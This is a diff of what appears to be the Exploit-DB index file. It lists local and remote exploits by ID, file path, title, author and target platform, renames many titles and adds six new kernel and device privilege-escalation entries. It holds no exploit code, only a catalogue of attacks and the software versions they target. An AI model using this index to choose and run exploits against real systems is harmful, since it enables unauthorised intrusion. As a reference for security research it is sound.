3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux, 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris, 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux, @@ -7601,7 +7604,7 @@ id,file,description,date,author,type,platform,port 19293,exploits/windows/local/19293.py,"Sysax 5.62 - Admin Interface Local Buffer Overflow",2012-06-20,"Craig Freyman",local,windows, 19602,exploits/linux/local/19602.c,"Eric Allman Sendmail 8.8.x - Socket Hijack",1999-11-05,"Michal Zalewski",local,linux, 19300,exploits/aix/local/19300.txt,"IBM AIX 4.2.1 - 'snap' Insecure Temporary File Creation",1999-02-17,"Larry W. Cashdollar",local,aix, -19302,exploits/linux/local/19302.c,"Linux libc 5.3.12 / RedHat Linux 4.0 / Slackware Linux 3.1 - libc NLSPATH",1998-01-19,Solar,local,linux, +19302,exploits/linux/local/19302.c,"Linux libc 5.3.12 (RedHat Linux 4.0 / Slackware Linux 3.1) - libc NLSPATH",1998-01-19,Solar,local,linux, 19304,exploits/irix/local/19304.txt,"SGI IRIX 6.4 - 'inpview' Local Privilege Escalation",1997-05-07,"Yuri Volobuev",local,irix, 19305,exploits/linux/local/19305.c,"RedHat Linux 5.0 - 'msgchk' Local Privilege Escalation",1998-01-19,"Cesar Tascon Alvarez",local,linux, 19306,exploits/aix/local/19306.c,"IBM AIX 4.2.1 - '/usr/bin/portmir' Local Buffer Overflow / Insecure Temporary File Creation",1997-10-29,"BM ERS Team",local,aix, @@ -7635,7 +7638,7 @@ id,file,description,date,author,type,platform,port 19356,exploits/irix/local/19356.txt,"SGI IRIX 6.3 - 'Systour' / 'OutOfBox' Local Privilege Escalation",1996-10-30,"Tun-Hui Hu",local,irix, 19358,exploits/irix/local/19358.txt,"SGI IRIX 6.4 - 'xfsdump' Local Privilege Escalation",1997-05-07,"Yuri Volobuev",local,irix, 19359,exploits/windows/local/19359.txt,"Microsoft Windows NT 4.0/SP1/SP2/SP3/SP4 / NT 3.5.1/SP1/SP2/SP3/SP4/SP5 - Screensaver",1999-03-10,"Cybermedia Software Private Limited",local,windows, -19360,exploits/linux/local/19360.c,"Linux libc 5.3.12/5.4 / RedHat Linux 4.0 - 'vsyslog()' Local Buffer Overflow",1997-12-21,"Solar Designer",local,linux, +19360,exploits/linux/local/19360.c,"Linux libc 5.3.12/5.4 (RedHat Linux 4.0) - 'vsyslog()' Local Buffer Overflow",1997-12-21,"Solar Designer",local,linux, 19362,exploits/sco/local/19362.c,"SCO Open Server 5.0.5 - XBase Buffer Overflow",1999-06-14,doble,local,sco, 19384,exploits/linux/local/19384.c,"Debian 2.1 - Print Queue Control",1999-07-02,"Chris Leishman",local,linux, 19370,exploits/linux/local/19370.c,"Xi Graphics Accelerated X 4.0.x/5.0 - Local Buffer Overflow",1999-06-25,KSR[T],local,linux, @@ -8013,7 +8016,7 @@ id,file,description,date,author,type,platform,port 20906,exploits/unix/local/20906.c,"kosch suid wrapper 1.1.1 - Local Buffer Overflow",2001-06-07,dex,local,unix, 20915,exploits/windows/local/20915.py,"ActFax Server 4.31 Build 0225 - Local Privilege Escalation",2012-08-29,"Craig Freyman",local,windows, 20923,exploits/unix/local/20923.c,"LPRng 3.6.x - Failure To Drop Supplementary Groups",2001-06-07,zen-parse,local,unix, -20926,exploits/linux/local/20926.txt,"Linux 6.1/6.2/7.0/7.1 Man Page - Source Buffer Overflow",2001-06-12,zen-parse,local,linux, +20926,exploits/linux/local/20926.txt,"Linux Man Page 6.1/6.2/7.0/7.1- Source Buffer Overflow",2001-06-12,zen-parse,local,linux, 20927,exploits/linux/local/20927.c,"BestCrypt 0.6/0.7/0.8 - BCTool UMount Buffer Overflow",2001-06-14,"Carl Livitt",local,linux, 20928,exploits/linux/local/20928.sh,"Rxvt 2.6.1/2.6.2 - Local Buffer Overflow",2001-06-15,MasterSecuritY,local,linux, 20937,exploits/irix/local/20937.c,"SGI Performance Co-Pilot 2.1.x/2.2 - pmpost Symbolic Link",2001-06-18,IhaQueR,local,irix, @@ -8403,7 +8406,7 @@ id,file,description,date,author,type,platform,port 23611,exploits/multiple/local/23611.pl,"OracleAS TopLink Mapping Workbench - Weak Encryption Algorithm",2004-01-28,"Pete Finnigan",local,multiple, 23634,exploits/linux/local/23634.c,"0verkill 0.16 - Game Client Multiple Local Buffer Overflow Vulnerabilities",2004-02-02,pi3ki31ny,local,linux, 23655,exploits/bsd/local/23655.txt,"BSD - SHMAT System Call Privilege Escalation",2004-02-05,"Joost Pol",local,bsd, -23658,exploits/linux/local/23658.c,"Linux VServer Project 1.2x - CHRoot Breakout",2004-02-06,"Markus Mueller",local,linux, +23658,exploits/linux/local/23658.c,"Linux VServer Project 1.2x - Chroot Breakout",2004-02-06,"Markus Mueller",local,linux, 23674,exploits/linux/local/23674.txt,"Samba 2.2.8 (Linux Kernel 2.6 / Debian / Mandrake) - Share Privilege Escalation",2004-02-09,"Martin Fiala",local,linux, 23682,exploits/linux/local/23682.c,"XFree86 4.3 - Font Information File Buffer Overflow",2004-11-10,bender2@lonestar.org,local,linux, 23738,exploits/linux/local/23738.c,"LGames LBreakout2 2.2.2 - Multiple Environment Variable Buffer Overflow Vulnerabilities",2004-02-21,Li0n7,local,linux, @@ -8978,8 +8981,8 @@ id,file,description,date,author,type,platform,port 37825,exploits/osx/local/37825.txt,"Apple Mac OSX 10.10.5 - 'XNU' Local Privilege Escalation",2015-08-18,kpwn,local,osx, 37710,exploits/linux/local/37710.txt,"Sudo 1.8.14 (RHEL 5/6/7 / Ubuntu) - 'Sudoedit' Unauthorized Privilege Escalation",2015-07-28,"daniel svartman",local,linux, 37716,exploits/windows/local/37716.c,"Heroes of Might and Magic III - Map Parsing Arbitrary Code Execution",2015-07-29,"John AAkerblom",local,windows, -37722,exploits/linux_x86-64/local/37722.c,"Linux espfix64 - Nested NMIs Interrupting Privilege Escalation",2015-08-05,"Andrew Lutomirski",local,linux_x86-64, -37724,exploits/linux_x86/local/37724.asm,"Linux (x86) - Memory Sinkhole Privilege Escalation",2015-08-07,"Christopher Domas",local,linux_x86, +37722,exploits/linux_x86-64/local/37722.c,"Linux Kernel - 'espfix64' Nested NMIs Interrupting Privilege Escalation",2015-08-05,"Andrew Lutomirski",local,linux_x86-64, +37724,exploits/linux_x86/local/37724.asm,"Linux Kernel (x86) - Memory Sinkhole Privilege Escalation",2015-08-07,"Christopher Domas",local,linux_x86, 37730,exploits/windows/local/37730.py,"Tomabo MP4 Player 3.11.3 - '.m3u' Local Buffer Overflow (SEH)",2015-08-07,"Saeid Atabaki",local,windows, 37732,exploits/windows_x86/local/37732.c,"Microsoft Windows XP SP3 (x86) / 2003 SP2 (x86) - 'NDProxy' Local Privilege Escalation (MS14-002)",2015-08-07,"Tomislav Paskalev",local,windows_x86, 38106,exploits/aix/local/38106.txt,"IBM AIX High Availability Cluster Multiprocessing (HACMP) - Local Privilege Escalation",2015-09-08,"Kristian Erik Hermansen",local,aix, @@ -9046,7 +9049,7 @@ id,file,description,date,author,type,platform,port 38452,exploits/windows/local/38452.txt,"CDex Genre 1.79 - Local Stack Buffer Overflow",2015-10-13,Un_N0n,local,windows, 38467,exploits/windows/local/38467.py,"AdobeWorkgroupHelper 2.8.3.3 - Local Stack Buffer Overflow",2015-10-15,hyp3rlinx,local,windows, 38472,exploits/windows/local/38472.py,"Blat 2.7.6 SMTP / NNTP Mailer - Local Buffer Overflow",2015-10-15,hyp3rlinx,local,windows, -38473,exploits/linux/local/38473.py,"Linux 3.17 - 'Python ctypes and memfd_create' noexec File Security Bypass",2015-10-15,soyer,local,linux, +38473,exploits/linux/local/38473.py,"Linux Kernel 3.17 - 'Python ctypes and memfd_create' noexec File Security Bypass",2015-10-15,soyer,local,linux, 38474,exploits/windows/local/38474.txt,"Microsoft Windows 10 - Sandboxed Mount Reparse Point Creation Mitigation Bypass (MS15-111)",2015-10-15,"Google Security Research",local,windows, 38486,exploits/windows/local/38486.py,"Tomabo MP4 Player 3.11.6 - Local Stack Overflow (SEH)",2015-10-18,"yokoacc_ nudragn_ rungga_reksya",local,windows, 38504,exploits/windows/local/38504.py,"HandyPassword 4.9.3 - Overwrite (SEH)",2015-10-21,Un_N0n,local,windows, @@ -9171,7 +9174,7 @@ id,file,description,date,author,type,platform,port 40054,exploits/linux/local/40054.c,"Exim 4 (Debian 8 / Ubuntu 16.04) - Spool Privilege Escalation",2016-07-04,halfdog,local,linux, 39980,exploits/windows/local/39980.rb,"Tomabo MP4 Player 3.11.6 - Local Stack Overflow (SEH) (Metasploit)",2016-06-20,s0nk3y,local,windows, 39984,exploits/windows_x86-64/local/39984.txt,"ACROS Security 0patch 2016.05.19.539 - '0PatchServicex64.exe' Unquoted Service Path Privilege Escalation",2016-06-20,LiquidWorm,local,windows_x86-64, -39992,exploits/linux/local/39992.md,"Linux - 'ecryptfs' '/proc/$pid/environ' Local Privilege Escalation",2016-06-21,"Google Security Research",local,linux, +39992,exploits/linux/local/39992.md,"Linux Kernel - 'ecryptfs' '/proc/$pid/environ' Local Privilege Escalation",2016-06-21,"Google Security Research",local,linux, 40017,exploits/windows/local/40017.py,"Mediacoder 0.8.43.5830 - '.m3u' Local Buffer Overflow (SEH)",2016-06-27,"Sibusiso Sishi",local,windows, 40018,exploits/windows/local/40018.py,"VUPlayer 2.49 (Windows 7) - '.m3u' Local Buffer Overflow (DEP Bypass)",2016-06-27,secfigo,local,windows, 40020,exploits/windows/local/40020.txt,"Panda Security (Multiple Products) - Local Privilege Escalation",2016-06-27,Security-Assessment.com,local,windows, @@ -9590,6 +9593,12 @@ id,file,description,date,author,type,platform,port 44270,exploits/windows/local/44270.txt,"WebLog Expert Enterprise 9.4 - Authentication Bypass",2018-03-09,hyp3rlinx,local,windows, 44279,exploits/linux/local/44279.py,"SC 7.16 - Stack-Based Buffer Overflow",2018-03-12,"Juan Sacco",local,linux, 44282,exploits/hardware/local/44282.txt,"Sony Playstation 4 (PS4) 4.55 < 5.50 - WebKit Code Execution (PoC)",2018-03-10,qwertyoruiop,local,hardware, +44298,exploits/linux/local/44298.c,"Linux Kernel < 4.4.0-116 (Ubuntu 16.04.4) - Local Privilege Escalation",2018-03-16,"Bruce Leidl",local,linux, +44299,exploits/linux/local/44299.c,"Linux Kernel < 3.5.0-23 (Ubuntu 12.04.2 x64) - 'SOCK_DIAG' SMEP Bypass Local Privilege Escalation",2018-03-19,"Vitaly Nikolenko",local,linux, +44300,exploits/linux/local/44300.c,"Linux Kernel < 4.4.0-21 (Ubuntu 16.04 x64) - 'netfilter target_offset' Local Privilege Escalation",2018-03-19,"Vitaly Nikolenko",local,linux, +44302,exploits/linux/local/44302.c,"Linux Kernel < 3.16.39 (Debian 8 x64) - 'inotfiy' Local Privilege Escalation",2017-10-16,"Jeremy Huang",local,linux, +44303,exploits/linux/local/44303.c,"Linux Kernel 4.13 (Debian 9) - Local Privilege Escalation",2017-12-11,anonymous,local,linux, +44306,exploits/hardware/local/44306.c,"Huawei Mate 7 - '/dev/hifi_misc' Privilege Escalation",2016-01-24,pray3r,local,hardware, 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139